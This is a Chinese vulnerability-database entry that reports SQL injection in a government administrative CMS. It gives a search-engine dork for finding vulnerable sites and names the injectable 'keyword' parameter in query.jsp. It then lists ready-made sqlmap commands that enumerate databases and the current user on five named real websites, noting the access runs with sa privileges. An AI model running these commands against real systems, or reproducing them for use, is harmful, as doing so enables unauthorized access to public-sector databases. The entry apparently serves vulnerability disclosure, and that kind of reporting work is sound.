|某政府行政cmssql注入漏洞 - VULHUB开源网络安全威胁库

某政府行政cmssql注入漏洞

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： rt ### 详细说明：问题厂商：深圳太极软件有限公司问题cms：jsp+sqlserver 注入全为sa权限谷歌关键字：inurl:application/zwdt 问题出在全局搜索 application/zwdt/query.jsp post:keyword= 选取五例： 1.http://www.lzxzsp.gov.cn sqlmap -u "http://www.lzxzsp.gov.cn/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --dbs [<img src="https://images.seebug.org/upload/201409/251813432721569eb63dd1e2dc6f27feb4fee067.jpg" alt="21.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/251813432721569eb63dd1e2dc6f27feb4fee067.jpg) sqlmap -u "http://www.lzxzsp.gov.cn/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --current-user [<img src="https://images.seebug.org/upload/201409/25181411b61d0ce9ec880bf80580755fc4248bd7.jpg" alt="22.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/25181411b61d0ce9ec880bf80580755fc4248bd7.jpg) 2.http://www.cqwsxzfw.com/ sqlmap -u "http://www.cqwsxzfw.com/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --dbs [<img src="https://images.seebug.org/upload/201409/25181921d6996ffd8a21f52f59c6e2694039feb1.jpg" alt="23.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/25181921d6996ffd8a21f52f59c6e2694039feb1.jpg) sqlmap -u "http://www.cqwsxzfw.com/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --current-user [<img src="https://images.seebug.org/upload/201409/251818415cafdf12b03b4dc77ee47add3ca34a5e.jpg" alt="24.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/251818415cafdf12b03b4dc77ee47add3ca34a5e.jpg) ### 漏洞证明： 3.http://www.ddkspdt.com sqlmap -u "http://www.ddkspdt.com/application/zwdt/query.jsp" --data "keyword=1&x=36&y=9" --dbs [<img src="https://images.seebug.org/upload/201409/2518282648d0551b5608e520984ef72849739daa.jpg" alt="25.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/2518282648d0551b5608e520984ef72849739daa.jpg) sqlmap -u "http://www.ddkspdt.com/application/zwdt/query.jsp" --data "keyword=1&x=36&y=9" --current-user [<img src="https://images.seebug.org/upload/201409/251821355023c9caeea7832491bcb5d31aec3424.jpg" alt="26.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/251821355023c9caeea7832491bcb5d31aec3424.jpg) 4.http://www.xsspfwdt.cn sqlmap -u "http://www.xsspfwdt.cn/application/zwdt/query.jsp" --data "keyword=1&x=36&y=9" --dbs [<img src="https://images.seebug.org/upload/201409/25182331b459048c7ca8a038a4e58dc432a03562.jpg" alt="27.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/25182331b459048c7ca8a038a4e58dc432a03562.jpg) sqlmap -u "http://www.xsspfwdt.cn/application/zwdt/query.jsp" --data "keyword=1&x=36&y=9" --current-user [<img src="https://images.seebug.org/upload/201409/251823401bb5d5114453966d4993df3d35495637.jpg" alt="28.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/251823401bb5d5114453966d4993df3d35495637.jpg) 5.http://www.cqspbxz.com/ sqlmap -u "http://www.cqspbxz.com/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --dbs [<img src="https://images.seebug.org/upload/201409/25184456ee13a817af8e8373bc7dfa2d4b370853.jpg" alt="123123213.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/25184456ee13a817af8e8373bc7dfa2d4b370853.jpg) sqlmap -u "http://www.cqspbxz.com/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --current-user [<img src="https://images.seebug.org/upload/201409/25184336838d2df98e1b8c8b6da71b86849ae23d.jpg" alt="QQ图片20140925184305.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/25184336838d2df98e1b8c8b6da71b86849ae23d.jpg)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™